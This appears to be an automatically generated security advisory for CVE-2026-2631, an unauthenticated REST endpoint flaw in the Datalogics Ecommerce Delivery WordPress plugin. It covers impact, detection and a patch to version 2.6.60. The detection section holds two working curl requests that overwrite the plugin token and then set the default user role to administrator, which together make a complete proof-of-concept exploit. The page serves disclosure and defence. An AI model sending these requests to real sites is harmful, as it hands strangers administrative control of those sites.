Executive Summary

[{'type': 'paragraph', 'content': 'CVE-2026-2631 affects the Datalogics Ecommerce Delivery WordPress plugin versions before 2.6.60. It involves an unauthenticated REST endpoint that allows any remote attacker to modify the `datalogics_token` option without verification.'}, {'type': 'paragraph', 'content': "This token is later used for authentication in a protected endpoint that permits arbitrary execution of WordPress's `update_option()` function. By exploiting this, an attacker can escalate privileges by enabling user registration and setting the default user role to administrator."}, {'type': 'paragraph', 'content': 'This means attackers can create new users who automatically have administrative privileges without any authentication.'}] [1]

Useful 0 Not Useful 0

Impact Analysis

The vulnerability allows attackers to gain administrative access to a WordPress site by enabling user registration and setting the default role to administrator.

This can lead to full site compromise, including the ability to modify site settings, install malicious plugins, steal sensitive data, or disrupt site operations.

Useful 0 Not Useful 0

Compliance Impact

I don't know

Useful 0 Not Useful 0

Detection Guidance

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking if the unauthenticated REST endpoint to update the `datalogics_token` is accessible and can be used to modify plugin options without authentication.'}, {'type': 'paragraph', 'content': 'You can use curl commands to test the vulnerability by attempting to update the token and then check if the settings for user registration and default role can be changed.'}, {'type': 'list_item', 'content': 'Test updating the token with an unauthenticated POST request: \n```curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-token" -H "Content-Type: application/json" -d \'{"token":"NXPOC-2026"}\'```'}, {'type': 'list_item', 'content': 'Attempt to update settings using the token to enable user registration and set default role to administrator: \n```curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-settings" -H "Content-Type: application/json" -d \'{ "token":"NXPOC-2026", "settings":{ "users_can_register":"1", "default_role":"administrator" } }\'```'}, {'type': 'paragraph', 'content': 'After running these commands, verify in the WordPress admin panel under "Settings > General" if user registration is enabled and the default role is set to administrator, which indicates the vulnerability is present.'}] [1]

Useful 0 Not Useful 0

Mitigation Strategies

The immediate mitigation step is to update the Datalogics Ecommerce Delivery WordPress plugin to version 2.6.60 or later, where this vulnerability has been fixed.

Until the update can be applied, consider restricting access to the vulnerable REST endpoints by implementing firewall rules or disabling the plugin if possible.

Additionally, review and reset the `datalogics_token` option and verify that user registration and default role settings have not been maliciously altered.

Useful 0 Not Useful 0